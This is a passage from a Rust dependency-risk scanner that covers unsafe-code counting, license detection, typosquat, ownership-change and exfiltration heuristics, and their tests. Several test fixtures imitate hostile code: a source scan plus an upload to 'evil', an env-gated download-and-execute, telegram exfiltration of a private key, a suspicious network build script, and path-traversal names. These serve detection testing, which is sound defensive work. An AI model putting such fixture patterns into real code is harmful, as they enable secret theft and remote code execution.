1408 recommendation:
1409 "Confirm that `unsafe` blocks are justified and reviewed. This is informational, not a vulnerability."
1410 .into(),
1411 });
1412 }
1413 }
1414
1415 if let Some(scan) = scan_source_exfil(&crate_dir) {
1420 if let Some(s) = &scan.source_exfil_sample {
1421 signals.push(source_exfil_signal(
1422 &package.id.to_string(),
1423 scan.source_exfil_network,
1424 scan.source_exfil_secrets,
1425 rel_display(source_root, s),
1426 ));
1427 }
1428 if let (Some(domain), Some(s)) = (scan.exfil_domain.as_deref(), &scan.domain_sample) {
1431 signals.push(exfil_domain_signal(
1432 &package.id.to_string(),
1433 domain,
1434 rel_display(source_root, s),
1435 ));
1436 }
1437 if let Some(s) = &scan.env_gated_sample {
1439 signals.push(env_gated_payload_signal(
1440 &package.id.to_string(),
1441 rel_display(source_root, s),
1442 ));
1443 }
1444 }
1445 }
1446 Ok(())
1447}
1448
1449fn license_signal(
1450 package: &Package,
1451 license: Option<&str>,
1452 manifest: &Path,
1453 source_root: &Path,
1454) -> RiskSignal {
1455 match license {
1456 Some(license) => RiskSignal {
1457 id: "license_detected".into(),
1458 package: package.id.to_string(),
1459 severity: Severity::Info,
1460 weight: 0,
1461 confidence: 1.0,
1462 evidence: vec![Evidence::with_path(
1463 "manifest",
1464 rel_display(source_root, manifest),
1465 format!("declared license: {license}"),
1466 )],
1467 recommendation: "Confirm the license is allowed by your organization policy.".into(),
1468 },
1469 None => RiskSignal {
1470 id: "license_unknown".into(),
1471 package: package.id.to_string(),
1472 severity: Severity::Low,
1473 weight: 4,
1474 confidence: 0.9,
1475 evidence: vec![Evidence::with_path(
1476 "manifest",
1477 rel_display(source_root, manifest),
1478 "no `license` or `license-file` field found in the manifest",
1479 )],
1480 recommendation: "Determine the crate's license before depending on it.".into(),
1481 },
1482 }
1483}
1484
1485struct ManifestMeta {
1487 links: Option<String>,
1488 license: Option<String>,
1489}
1490
1491fn read_manifest(path: &Path) -> Option<ManifestMeta> {
1492 let content = crate::safety::read_file_capped(path, crate::safety::MAX_SOURCE_FILE_BYTES)?;
1493 let value: toml::Value = toml::from_str(&content).ok()?;
1494 let package = value.get("package")?;
1495 let links = package
1496 .get("links")
1497 .and_then(|v| v.as_str())
1498 .map(|s| s.to_string());
1499 let license = package
1500 .get("license")
1501 .and_then(|v| v.as_str())
1502 .map(|s| s.to_string())
1503 .or_else(|| {
1504 package
1505 .get("license-file")
1506 .and_then(|v| v.as_str())
1507 .map(|f| format!("file:{f}"))
1508 });
1509 Some(ManifestMeta { links, license })
1510}
1511
1512fn count_unsafe(crate_dir: &Path) -> Option<(UnsafeStats, PathBuf)> {
1519 use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
1520
1521 let mut total = UnsafeStats::default();
1522 let mut sample: Option<PathBuf> = None;
1523 let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
1525 vec![(crate_dir.join("src"), 0)]
1526 } else {
1527 vec![(crate_dir.to_path_buf(), 0)]
1528 };
1529
1530 let mut visited = 0usize;
1531 while let Some((dir, depth)) = stack.pop() {
1532 for entry in sorted_dir_entries(&dir) {
1533 if visited >= MAX_DIR_ENTRIES {
1534 return sample.map(|s| (total, s));
1535 }
1536 visited += 1;
1537 let Ok(ft) = entry.file_type() else { continue };
1539 if ft.is_symlink() {
1540 continue; }
1542 let path = entry.path();
1543 if ft.is_dir() {
1544 if depth < MAX_DIR_DEPTH {
1545 stack.push((path, depth + 1));
1546 }
1547 continue;
1548 }
1549 if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
1550 if let Some(content) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES)
1551 {
1552 let stats = scan_unsafe(&content);
1553 if stats.total > 0 {
1554 if sample.is_none() {
1555 sample = Some(path.clone());
1556 }
1557 total.add(&stats);
1558 }
1559 }
1560 }
1561 }
1562 }
1563 sample.map(|s| (total, s))
1564}
1565
1566#[derive(Debug, Default, Clone, Copy)]
1569pub(crate) struct UnsafeStats {
1570 total: usize,
1571 fns: usize,
1572 impls: usize,
1573 traits: usize,
1574 blocks: usize,
1575}
1576
1577impl UnsafeStats {
1578 fn add(&mut self, o: &UnsafeStats) {
1579 self.total += o.total;
1580 self.fns += o.fns;
1581 self.impls += o.impls;
1582 self.traits += o.traits;
1583 self.blocks += o.blocks;
1584 }
1585
1586 fn breakdown(&self) -> String {
1588 let mut parts = Vec::new();
1589 if self.fns > 0 {
1590 parts.push(format!("{} fn", self.fns));
1591 }
1592 if self.impls > 0 {
1593 parts.push(format!("{} impl", self.impls));
1594 }
1595 if self.traits > 0 {
1596 parts.push(format!("{} trait", self.traits));
1597 }
1598 if self.blocks > 0 {
1599 parts.push(format!("{} block", self.blocks));
1600 }
1601 if parts.is_empty() {
1602 self.total.to_string()
1603 } else {
1604 format!("{} ({})", self.total, parts.join(", "))
1605 }
1606 }
1607}
1608
1609pub(crate) fn scan_unsafe(src: &str) -> UnsafeStats {
1617 let b = src.as_bytes();
1618 let n = b.len();
1619 let mut stats = UnsafeStats::default();
1620 let mut i = 0;
1621
1622 enum State {
1623 Normal,
1624 Line,
1625 Block(usize),
1626 Str,
1627 Raw(usize),
1628 }
1629 let mut st = State::Normal;
1630
1631 while i < n {
1632 match st {
1633 State::Normal => {
1634 if b[i] == b'/' && i + 1 < n && b[i + 1] == b'/' {
1635 st = State::Line;
1636 i += 2;
1637 } else if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1638 st = State::Block(1);
1639 i += 2;
1640 } else if let Some((hashes, skip)) = raw_string_start(b, i) {
1641 st = State::Raw(hashes);
1642 i += skip;
1643 } else if b[i] == b'"' {
1644 st = State::Str;
1645 i += 1;
1646 } else if b[i] == b'\'' {
1647 i += char_literal_len(b, i); } else if b[i] == b'u' && matches_unsafe(b, i) {
1649 stats.total += 1;
1650 categorize(b, i + 6, &mut stats);
1651 i += 6;
1652 } else {
1653 i += 1;
1654 }
1655 }
1656 State::Line => {
1657 if b[i] == b'\n' {
1658 st = State::Normal;
1659 }
1660 i += 1;
1661 }
1662 State::Block(d) => {
1663 if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1664 st = State::Block(d + 1);
1665 i += 2;
1666 } else if b[i] == b'*' && i + 1 < n && b[i + 1] == b'/' {
1667 st = if d == 1 {
1668 State::Normal
1669 } else {
1670 State::Block(d - 1)
1671 };
1672 i += 2;
1673 } else {
1674 i += 1;
1675 }
1676 }
1677 State::Str => {
1678 if b[i] == b'\\' {
1679 i += 2;
1680 } else {
1681 if b[i] == b'"' {
1682 st = State::Normal;
1683 }
1684 i += 1;
1685 }
1686 }
1687 State::Raw(h) => {
1688 if b[i] == b'"' && i + 1 + h <= n && b[i + 1..i + 1 + h].iter().all(|&c| c == b'#')
1689 {
1690 st = State::Normal;
1691 i += 1 + h;
1692 } else {
1693 i += 1;
1694 }
1695 }
1696 }
1697 }
1698 stats
1699}
1700
1701fn matches_unsafe(b: &[u8], i: usize) -> bool {
1703 if i + 6 > b.len() || &b[i..i + 6] != b"unsafe" {
1704 return false;
1705 }
1706 let before_ok = i == 0 || !is_ident_byte(b[i - 1]);
1707 let after_ok = i + 6 >= b.len() || !is_ident_byte(b[i + 6]);
1708 before_ok && after_ok
1709}
1710
1711fn categorize(b: &[u8], mut j: usize, stats: &mut UnsafeStats) {
1713 while j < b.len() && b[j].is_ascii_whitespace() {
1714 j += 1;
1715 }
1716 let starts = |kw: &[u8]| -> bool {
1717 j + kw.len() <= b.len()
1718 && &b[j..j + kw.len()] == kw
1719 && (j + kw.len() == b.len() || !is_ident_byte(b[j + kw.len()]))
1720 };
1721 if starts(b"fn") {
1722 stats.fns += 1;
1723 } else if starts(b"impl") {
1724 stats.impls += 1;
1725 } else if starts(b"trait") {
1726 stats.traits += 1;
1727 } else {
1728 stats.blocks += 1;
1729 }
1730}
1731
1732fn raw_string_start(b: &[u8], i: usize) -> Option<(usize, usize)> {
1735 if i > 0 && is_ident_byte(b[i - 1]) {
1737 return None;
1738 }
1739 let mut p = i;
1740 if b.get(p) == Some(&b'b') {
1741 p += 1; }
1743 if b.get(p) != Some(&b'r') {
1744 return None;
1745 }
1746 p += 1;
1747 let hash_start = p;
1748 while b.get(p) == Some(&b'#') {
1749 p += 1;
1750 }
1751 if b.get(p) == Some(&b'"') {
1752 let hashes = p - hash_start;
1753 Some((hashes, p - i + 1)) } else {
1755 None
1756 }
1757}
1758
1759fn char_literal_len(b: &[u8], i: usize) -> usize {
1763 if b.get(i + 1) == Some(&b'\\') {
1765 let mut p = i + 2;
1767 let end = (i + 12).min(b.len());
1768 while p < end {
1769 if b[p] == b'\'' {
1770 return p - i + 1;
1771 }
1772 p += 1;
1773 }
1774 1
1775 } else if b.get(i + 2) == Some(&b'\'') && b.get(i + 1) != Some(&b'\'') {
1776 3 } else {
1778 1 }
1780}
1781
1782fn is_ident_byte(b: u8) -> bool {
1783 b.is_ascii_alphanumeric() || b == b'_'
1784}
1785
1786fn locate_crate_dir(source_root: &Path, package: &Package) -> Option<PathBuf> {
1795 use crate::safety::{
1796 is_contained_within, is_safe_crate_name, is_safe_path_segment, is_safe_version,
1797 };
1798
1799 if !is_safe_crate_name(&package.id.name) || !is_safe_version(&package.id.version) {
1800 return None;
1801 }
1802 let dir_name = format!("{}-{}", package.id.name, package.id.version);
1803 if !is_safe_path_segment(&dir_name) {
1804 return None;
1805 }
1806
1807 let verify = |candidate: PathBuf| -> Option<PathBuf> {
1808 let meta = std::fs::symlink_metadata(&candidate).ok()?;
1810 if !meta.file_type().is_dir() {
1811 return None;
1812 }
1813 if is_contained_within(source_root, &candidate) {
1814 Some(candidate)
1815 } else {
1816 None
1817 }
1818 };
1819
1820 if let Some(dir) = verify(source_root.join(&dir_name)) {
1821 return Some(dir);
1822 }
1823 for entry in sorted_dir_entries(source_root) {
1828 let Ok(ft) = entry.file_type() else { continue };
1829 if !ft.is_dir() {
1830 continue; }
1832 if let Some(dir) = verify(entry.path().join(&dir_name)) {
1833 return Some(dir);
1834 }
1835 }
1836 None
1837}
1838
1839fn rel_display(root: &Path, path: &Path) -> String {
1840 path.strip_prefix(root)
1841 .unwrap_or(path)
1842 .display()
1843 .to_string()
1844}
1845
1846#[cfg(test)]
1847mod tests {
1848 use super::*;
1849 use crate::lockfile::PackageId;
1850
1851 fn pkg(name: &str, version: &str, local: bool) -> Package {
1852 Package {
1853 id: PackageId {
1854 name: name.into(),
1855 version: version.into(),
1856 source: if local {
1857 None
1858 } else {
1859 Some("registry+https://github.com/rust-lang/crates.io-index".into())
1860 },
1861 },
1862 checksum: None,
1863 dependencies: vec![],
1864 }
1865 }
1866
1867 fn lock(packages: Vec<Package>) -> LockfileModel {
1868 LockfileModel {
1869 path: PathBuf::from("Cargo.lock"),
1870 version: Some(3),
1871 packages,
1872 }
1873 }
1874
1875 fn opts_with_meta(pairs: &[(&str, crate::CrateMetadata)]) -> AnalysisOptions {
1876 let mut metadata = std::collections::BTreeMap::new();
1877 for (k, m) in pairs {
1878 metadata.insert((*k).to_string(), m.clone());
1879 }
1880 AnalysisOptions {
1881 metadata,
1882 ..Default::default()
1883 }
1884 }
1885
1886 #[test]
1887 fn typosquat_cleared_by_high_downloads() {
1888 let lk = lock(vec![pkg("miow", "0.6.1", false)]);
1891 let opts = opts_with_meta(&[(
1892 "miow@0.6.1",
1893 crate::CrateMetadata {
1894 total_downloads: Some(53_000_000),
1895 ..Default::default()
1896 },
1897 )]);
1898 let mut sig = vec![];
1899 collect_typosquat(&lk, &opts, &mut sig);
1900 assert!(
1901 sig.iter().all(|s| s.id != "possible_typosquat"),
1902 "established crate must not be flagged as a typosquat"
1903 );
1904 }
1905
1906 #[test]
1907 fn typosquat_flagged_when_obscure() {
1908 let lk = lock(vec![pkg("miow", "0.0.1", false)]);
1910 let opts = opts_with_meta(&[(
1911 "miow@0.0.1",
1912 crate::CrateMetadata {
1913 total_downloads: Some(42),
1914 ..Default::default()
1915 },
1916 )]);
1917 let mut sig = vec![];
1918 collect_typosquat(&lk, &opts, &mut sig);
1919 let f = sig
1920 .iter()
1921 .find(|s| s.id == "possible_typosquat")
1922 .expect("obscure look-alike must be flagged");
1923 assert_eq!(f.severity, Severity::Medium);
1924 }
1925
1926 #[test]
1927 fn typosquat_offline_is_quiet_info() {
1928 let lk = lock(vec![pkg("miow", "0.6.1", false)]);
1931 let opts = AnalysisOptions::default();
1932 let mut sig = vec![];
1933 collect_typosquat(&lk, &opts, &mut sig);
1934 let f = sig
1935 .iter()
1936 .find(|s| s.id == "possible_typosquat")
1937 .expect("offline hint present");
1938 assert_eq!(f.severity, Severity::Info);
1939 }
1940
1941 #[test]
1942 fn freshness_flags_only_recent_versions() {
1943 let lk = lock(vec![pkg("somecrate", "1.0.0", false)]);
1944 let fresh = opts_with_meta(&[(
1945 "somecrate@1.0.0",
1946 crate::CrateMetadata {
1947 published_days_ago: Some(3),
1948 ..Default::default()
1949 },
1950 )]);
1951 let mut sig = vec![];
1952 collect_freshness(&lk, &fresh, &mut sig);
1953 assert_eq!(
1954 sig.iter().filter(|s| s.id == "freshly_published").count(),
1955 1,
1956 "a 3-day-old version must be flagged fresh"
1957 );
1958
1959 let old = opts_with_meta(&[(
1960 "somecrate@1.0.0",
1961 crate::CrateMetadata {
1962 published_days_ago: Some(400),
1963 ..Default::default()
1964 },
1965 )]);
1966 let mut sig2 = vec![];
1967 collect_freshness(&lk, &old, &mut sig2);
1968 assert!(sig2.is_empty(), "an old version must not be flagged fresh");
1969 }
1970
1971 fn opts_with_owners(meta: &[(&str, &[&str])], trusted: &[(&str, &[&str])]) -> AnalysisOptions {
1972 let mut metadata = std::collections::BTreeMap::new();
1973 for (k, owners) in meta {
1974 metadata.insert(
1975 (*k).to_string(),
1976 crate::CrateMetadata {
1977 owners: owners.iter().map(|s| s.to_string()).collect(),
1978 ..Default::default()
1979 },
1980 );
1981 }
1982 let mut trusted_owners = std::collections::BTreeMap::new();
1983 for (k, owners) in trusted {
1984 trusted_owners.insert(
1985 (*k).to_string(),
1986 owners.iter().map(|s| s.to_string()).collect(),
1987 );
1988 }
1989 AnalysisOptions {
1990 metadata,
1991 trusted_owners,
1992 ..Default::default()
1993 }
1994 }
1995
1996 #[test]
1997 fn owners_changed_flags_new_maintainer() {
1998 let lk = lock(vec![pkg("xz2", "0.1.7", false)]);
2001 let opts = opts_with_owners(
2002 &[("xz2@0.1.7", &["Lasse", "JiaT75"])],
2003 &[("xz2", &["Lasse"])],
2004 );
2005 let mut sig = vec![];
2006 collect_owners_changed(&lk, &opts, &mut sig);
2007 let f = sig
2008 .iter()
2009 .find(|s| s.id == "owners_changed")
2010 .expect("a new maintainer must be flagged");
2011 assert_eq!(f.severity, Severity::Medium);
2012 assert!(f.evidence[0].summary.contains("JiaT75"));
2013 }
2014
2015 #[test]
2016 fn owners_unchanged_emits_nothing() {
2017 let lk = lock(vec![pkg("serde", "1.0.0", false)]);
2018 let opts = opts_with_owners(&[("serde@1.0.0", &["dtolnay"])], &[("serde", &["dtolnay"])]);
2019 let mut sig = vec![];
2020 collect_owners_changed(&lk, &opts, &mut sig);
2021 assert!(sig.is_empty(), "unchanged owners must not be flagged");
2022 }
2023
2024 #[test]
2025 fn owners_without_baseline_emits_nothing() {
2026 let lk = lock(vec![pkg("serde", "1.0.0", false)]);
2029 let opts = opts_with_owners(&[("serde@1.0.0", &["newowner"])], &[]);
2030 let mut sig = vec![];
2031 collect_owners_changed(&lk, &opts, &mut sig);
2032 assert!(sig.is_empty(), "no baseline -> no signal");
2033 }
2034
2035 #[test]
2036 fn owners_changed_survives_known_good_baseline() {
2037 assert!(is_known_good("libc"), "test premise: libc is known-good");
2040 let lk = lock(vec![pkg("libc", "0.2.0", false)]);
2041 let opts = opts_with_owners(
2042 &[("libc@0.2.0", &["alice", "mallory"])],
2043 &[("libc", &["alice"])],
2044 );
2045 let signals = collect_basic_signals(&lk, &opts).unwrap();
2046 let f = signals
2047 .iter()
2048 .find(|s| s.id == "owners_changed")
2049 .expect("owners_changed present");
2050 assert_eq!(
2051 f.severity,
2052 Severity::Medium,
2053 "ownership change must survive the known-good baseline"
2054 );
2055 assert!(f.weight > 0, "must still count toward risk");
2056 }
2057
2058 #[test]
2059 fn owners_changed_detected_on_later_version_without_first_metadata() {
2060 let lk = lock(vec![
2063 pkg("foo-crate", "1.0.0", false),
2064 pkg("foo-crate", "2.0.0", false),
2065 ]);
2066 let opts = opts_with_owners(
2067 &[("foo-crate@2.0.0", &["alice", "newowner"])],
2068 &[("foo-crate", &["alice"])],
2069 );
2070 let mut sig = vec![];
2071 collect_owners_changed(&lk, &opts, &mut sig);
2072 assert_eq!(
2073 sig.iter().filter(|s| s.id == "owners_changed").count(),
2074 1,
2075 "ownership change on a non-first version must be detected"
2076 );
2077 }
2078
2079 #[test]
2080 fn locate_crate_dir_rejects_path_traversal() {
2081 let root = std::env::temp_dir();
2083 for evil in ["../../etc", "..", "foo/bar", "a/../../b"] {
2084 let p = pkg(evil, "1.0.0", false);
2085 assert!(
2086 locate_crate_dir(&root, &p).is_none(),
2087 "traversal name {evil:?} must be refused"
2088 );
2089 }
2090 let p = pkg("serde", "../../etc", false);
2092 assert!(locate_crate_dir(&root, &p).is_none());
2093 }
2094
2095 #[test]
2096 fn detects_native_ffi_by_name() {
2097 let model = lock(vec![pkg("openssl-sys", "0.9.99", false)]);
2098 let mut signals = vec![];
2099 collect_name_heuristics(&model, &mut signals);
2100 assert!(signals.iter().any(|s| s.id == "native_ffi_detected"));
2101 let s = signals
2102 .iter()
2103 .find(|s| s.id == "native_ffi_detected")
2104 .unwrap();
2105 assert_eq!(s.severity, Severity::Low);
2107 assert!(s.confidence >= 0.5);
2108 }
2109
2110 #[test]
2111 fn known_good_crate_downgraded_to_baseline() {
2112 let model = lock(vec![pkg("windows-sys", "0.61.2", false)]);
2113 let signals = collect_basic_signals(&model, &AnalysisOptions::default()).unwrap();
2114 let ffi = signals
2115 .iter()
2116 .find(|s| s.id == "native_ffi_detected")
2117 .expect("signal kept for transparency");
2118 assert_eq!(ffi.severity, Severity::Info);
2119 assert_eq!(ffi.weight, 0);
2120 assert!(ffi.evidence.iter().any(|e| e.kind == "baseline"));
2121 assert!(is_known_good("windows-sys"));
2122 assert!(!is_known_good("openssl-sys"));
2123 }
2124
2125 #[test]
2126 fn local_crate_not_flagged_for_ffi() {
2127 let model = lock(vec![pkg("my-app-sys", "0.1.0", true)]);
2128 let mut signals = vec![];
2129 collect_name_heuristics(&model, &mut signals);
2130 assert!(signals.is_empty());
2131 }
2132
2133 #[test]
2134 fn damerau_levenshtein_basics() {
2135 assert_eq!(damerau_levenshtein("serde", "serde"), 0);
2136 assert_eq!(damerau_levenshtein("serde", "serdf"), 1); assert_eq!(damerau_levenshtein("tokio", "tokoi"), 1); assert_eq!(damerau_levenshtein("reqwest", "reqwes"), 1); assert_eq!(damerau_levenshtein("serde", "serde_json"), 5);
2140 }
2141
2142 #[test]
2143 fn detects_typosquat_one_edit_away() {
2144 let model = lock(vec![pkg("reqwset", "1.0.0", false)]); let mut signals = vec![];
2146 collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2147 let s = signals
2148 .iter()
2149 .find(|s| s.id == "possible_typosquat")
2150 .unwrap();
2151 assert!(s.evidence[0].summary.contains("reqwest"));
2152 }
2153
2154 #[test]
2155 fn does_not_flag_legitimate_crates() {
2156 let model = lock(vec![
2158 pkg("serde_json", "1.0.0", false),
2159 pkg("tokio-util", "0.7.0", false),
2160 pkg("my-app-utils", "0.1.0", false),
2161 pkg("serde", "1.0.0", false), ]);
2163 let mut signals = vec![];
2164 collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2165 assert!(signals.is_empty(), "false positives: {signals:?}");
2166 }
2167
2168 #[test]
2169 fn legit_lookalikes_are_not_typosquats() {
2170 let model = lock(vec![
2174 pkg("mime", "0.3.17", false),
2175 pkg("md-5", "0.10.6", false),
2176 pkg("anes", "0.1.6", false),
2177 ]);
2178 let mut signals = vec![];
2179 collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2180 assert!(signals.is_empty(), "false positives: {signals:?}");
2181 }
2182
2183 fn scratch_crate(tag: &str, files: &[(&str, &str)]) -> PathBuf {
2187 let root = std::env::temp_dir().join(format!(
2188 "rustinel_exfil_{}_{}_{}",
2189 tag,
2190 std::process::id(),
2191 files.len()
2192 ));
2193 let _ = std::fs::remove_dir_all(&root);
2194 std::fs::create_dir_all(root.join("src")).unwrap();
2195 for (rel, body) in files {
2196 let p = root.join("src").join(rel);
2197 if let Some(parent) = p.parent() {
2198 std::fs::create_dir_all(parent).unwrap();
2199 }
2200 std::fs::write(&p, body).unwrap();
2201 }
2202 root
2203 }
2204
2205 #[test]
2206 fn source_exfil_signal_builds_high() {
2207 let sig = source_exfil_signal("x@1", false, true, "lib.rs".into());
2210 assert_eq!(sig.id, "suspicious_source_exfil");
2211 assert_eq!(sig.severity, Severity::High);
2212 assert!(sig
2213 .evidence
2214 .iter()
2215 .any(|e| e.summary.contains("wallet/private-key")));
2216 let sig = source_exfil_signal("x@1", true, false, "lib.rs".into());
2217 assert!(sig
2218 .evidence
2219 .iter()
2220 .any(|e| e.summary.contains("exfiltrates over the network")));
2221 }
2222
2223 #[test]
2224 fn source_exfil_conjunction_must_hold_in_one_file() {
2225 let only_scan = scratch_crate(
2227 "scan",
2228 &[(
2229 "codegen.rs",
2230 "let _ = std::fs::read_dir(\".\"); let x = \".rs\";",
2231 )],
2232 );
2233 assert!(scan_source_exfil(&only_scan)
2234 .and_then(|s| s.source_exfil_sample)
2235 .is_none());
2236 let _ = std::fs::remove_dir_all(&only_scan);
2237
2238 let cross = scratch_crate(
2242 "cross",
2243 &[
2244 (
2245 "codegen.rs",
2246 "fn g(){ let _=std::fs::read_dir(\".\"); let _=\".rs\"; }",
2247 ),
2248 (
2249 "client.rs",
2250 "fn f(){ let _ = reqwest::blocking::get(\"http://x\"); }",
2251 ),
2252 ],
2253 );
2254 assert!(
2255 scan_source_exfil(&cross)
2256 .and_then(|s| s.source_exfil_sample)
2257 .is_none(),
2258 "cross-file scan + network must NOT fire (benign codegen + HTTP client)"
2259 );
2260 let _ = std::fs::remove_dir_all(&cross);
2261
2262 let bad = scratch_crate(
2264 "bad",
2265 &[(
2266 "steal.rs",
2267 "fn s(){ for e in std::fs::read_dir(\".\").unwrap(){ let _=\".rs\"; \
2268 let _=reqwest::blocking::get(\"http://evil\"); } }",
2269 )],
2270 );
2271 let scan = scan_source_exfil(&bad).expect("scan");
2272 assert!(
2273 scan.source_exfil_sample.is_some(),
2274 "single-file scan+network IS the fingerprint"
2275 );
2276 assert!(scan.source_exfil_network);
2277 let _ = std::fs::remove_dir_all(&bad);
2278 }
2279
2280 #[test]
2281 fn env_gated_requires_causal_proximity() {
2282 let tight = "fn run() {\n if std::env::var(\"GITLAB_CI\").is_ok() {\n \
2285 let _ = reqwest::blocking::get(\"http://x/p.bin\");\n \
2286 std::process::Command::new(\"/tmp/p.bin\").status();\n }\n}\n";
2287 assert!(
2288 env_gated_block(tight),
2289 "tight download-and-execute must be flagged"
2290 );
2291
2292 let mut scattered = String::from("let _cfg = std::env::var(\"APP_RPC\");\n");
2295 scattered.push_str(&"// unrelated code\n".repeat(80));
2296 scattered.push_str("let _ = reqwest::blocking::get(\"https://rpc.example\");\n");
2297 scattered.push_str(&"// unrelated code\n".repeat(80));
2298 scattered.push_str("std::process::Command::new(resolve_cargo_binary()).status();\n");
2299 assert!(
2300 !env_gated_block(&scattered),
2301 "unrelated env/network/spawn scattered across a large file must NOT be flagged"
2302 );
2303 }
2304
2305 #[test]
2306 fn dual_use_service_domain_needs_secret_corroboration() {
2307 let benign = scratch_crate(
2310 "tg_benign",
2311 &[(
2312 "lib.rs",
2313 "pub fn send(){ let _=reqwest::blocking::get(\"https://api.telegram.org/bot1/sendMessage\"); }",
2314 )],
2315 );
2316 assert!(
2317 scan_source_exfil(&benign)
2318 .and_then(|s| s.exfil_domain)
2319 .is_none(),
2320 "a telegram crate must not trip the domain signal without the exfil shape"
2321 );
2322 let _ = std::fs::remove_dir_all(&benign);
2323
2324 let exfil = scratch_crate(
2326 "tg_exfil",
2327 &[(
2328 "lib.rs",
2329 "pub fn steal(){ let _k=\"private_key\"; let _=reqwest::blocking::get(\"https://api.telegram.org/bot/x\"); }",
2330 )],
2331 );
2332 assert!(
2333 scan_source_exfil(&exfil)
2334 .and_then(|s| s.exfil_domain)
2335 .is_some(),
2336 "telegram + secret handling IS the exfil shape"
2337 );
2338 let _ = std::fs::remove_dir_all(&exfil);
2339
2340 let host = scratch_crate(
2342 "cf_exfil",
2343 &[(
2344 "lib.rs",
2345 "pub fn x(){ let _=reqwest::blocking::get(\"https://evil.workers.dev/c\"); }",
2346 )],
2347 );
2348 assert!(
2349 scan_source_exfil(&host)
2350 .and_then(|s| s.exfil_domain)
2351 .is_some(),
2352 "a pure exfil host is suspicious on its own"
2353 );
2354 let _ = std::fs::remove_dir_all(&host);
2355 }
2356
2357 #[test]
2358 fn evidence_sample_is_walk_order_independent() {
2359 let dir = scratch_crate(
2365 "unsafe_det",
2366 &[
2367 ("z_last.rs", "pub unsafe fn z() { unsafe {} }"),
2368 ("a_first.rs", "pub unsafe fn a() { unsafe {} }"),
2369 ],
2370 );
2371 let (stats, sample) = count_unsafe(&dir).expect("unsafe found in the crate");
2372 assert!(stats.total >= 2, "both files' unsafe should be counted");
2373 assert!(
2374 sample.ends_with("a_first.rs"),
2375 "evidence sample must be the lexicographically-first match, was {sample:?}"
2376 );
2377 let _ = std::fs::remove_dir_all(&dir);
2378 }
2379
2380 #[test]
2381 fn sorted_dir_entries_is_lexicographic() {
2382 let dir = scratch_crate(
2383 "sorted_entries",
2384 &[("c.rs", "x"), ("a.rs", "x"), ("b.rs", "x")],
2385 );
2386 let names: Vec<String> = sorted_dir_entries(&dir.join("src"))
2387 .iter()
2388 .map(|e| e.file_name().to_string_lossy().into_owned())
2389 .collect();
2390 assert_eq!(names, vec!["a.rs", "b.rs", "c.rs"]);
2391 let _ = std::fs::remove_dir_all(&dir);
2392 }
2393
2394 #[test]
2395 fn benign_build_script_is_not_suspicious() {
2396 let src = "fn main() {\n println!(\"cargo:rustc-link-lib=ssl\");\n}\n";
2398 assert!(build_script_intent_signal("openssl-sys@0.9.99", src, "build.rs".into()).is_none());
2399 }
2400
2401 #[test]
2402 fn network_build_script_is_high() {
2403 let src = "fn main(){ let _ = reqwest::blocking::get(\"http://evil/x\"); }";
2404 let sig = build_script_intent_signal("evil@1.0.0", src, "build.rs".into()).unwrap();
2405 assert_eq!(sig.id, "build_script_suspicious");
2406 assert_eq!(sig.severity, Severity::High);
2407 assert!(sig
2408 .evidence
2409 .iter()
2410 .any(|e| e.summary.contains("network access")));
2411 }
2412
2413 #[test]
2414 fn payload_build_script_is_medium() {
2415 let src = "fn main(){ let p = include_bytes!(\"blob.bin\"); let _ = p; }";
2416 let sig = build_script_intent_signal("sneaky@1.0.0", src, "build.rs".into()).unwrap();
2417 assert_eq!(sig.severity, Severity::Medium);
2418 assert!(sig.evidence.iter().any(|e| e.summary.contains("payload")));
2419 }
2420
2421 #[test]
2422 fn dlopen_in_a_feature_name_is_not_a_payload() {
2423 let benign = "fn main(){\n println!(\"cargo:rerun-if-env-changed=RUST_FONTCONFIG_DLOPEN\");\n \
2427 if std::env::var(\"RUST_FONTCONFIG_DLOPEN\").is_ok() {\n \
2428 println!(\"cargo:rustc-cfg=feature=\\\"source-fontconfig-dlopen\\\"\");\n }\n}\n";
2429 assert!(
2430 build_script_intent_signal("font-kit@1.0.0", benign, "build.rs".into()).is_none(),
2431 "a `*-dlopen` feature/env name must not be read as dynamic loading"
2432 );
2433 let real = "fn main(){ unsafe { let _ = libc::dlopen(p, 1); } }";
2435 assert!(build_script_intent_signal("x@1.0.0", real, "build.rs".into()).is_some());
2436 }
2437
2438 #[test]
2439 fn detects_multiple_versions() {
2440 let model = lock(vec![pkg("foo", "1.0.0", false), pkg("foo", "2.0.0", false)]);
2441 let mut signals = vec![];
2442 collect_multiple_versions(&model, &mut signals);
2443 assert_eq!(
2444 signals
2445 .iter()
2446 .filter(|s| s.id == "multiple_versions_same_crate")
2447 .count(),
2448 2
2449 );
2450 }
2451
2452 #[test]
2453 fn unsafe_scan_counts_only_real_code() {
2454 assert_eq!(scan_unsafe("unsafe { *p }").total, 1);
2455 assert_eq!(scan_unsafe("no danger here").total, 0);
2456 assert_eq!(scan_unsafe("let unsafely = 1; // unsafe").total, 0);
2458 }
2459
2460 #[test]
2461 fn unsafe_scan_ignores_comments_and_strings() {
2462 let src = r##"
2463 // unsafe in a line comment
2464 /* unsafe in a block /* nested unsafe */ comment */
2465 let s = "this unsafe is a string";
2466 let r = r#"raw unsafe"#;
2467 fn real() { unsafe { } }
2468 "##;
2469 let st = scan_unsafe(src);
2470 assert_eq!(st.total, 1, "only the real unsafe block counts, got {st:?}");
2471 assert_eq!(st.blocks, 1);
2472 }
2473
2474 #[test]
2475 fn unsafe_scan_categorizes() {
2476 let src = "unsafe fn a(){} unsafe impl T for U {} unsafe trait W {} fn b(){ unsafe { } }";
2477 let st = scan_unsafe(src);
2478 assert_eq!(st.total, 4);
2479 assert_eq!(st.fns, 1);
2480 assert_eq!(st.impls, 1);
2481 assert_eq!(st.traits, 1);
2482 assert_eq!(st.blocks, 1);
2483 assert_eq!(st.breakdown(), "4 (1 fn, 1 impl, 1 trait, 1 block)");
2484 }
2485
2486 #[test]
2487 fn unsafe_scan_handles_char_literal_with_quote() {
2488 let src = "let q = '\"'; unsafe { }";
2490 assert_eq!(scan_unsafe(src).total, 1);
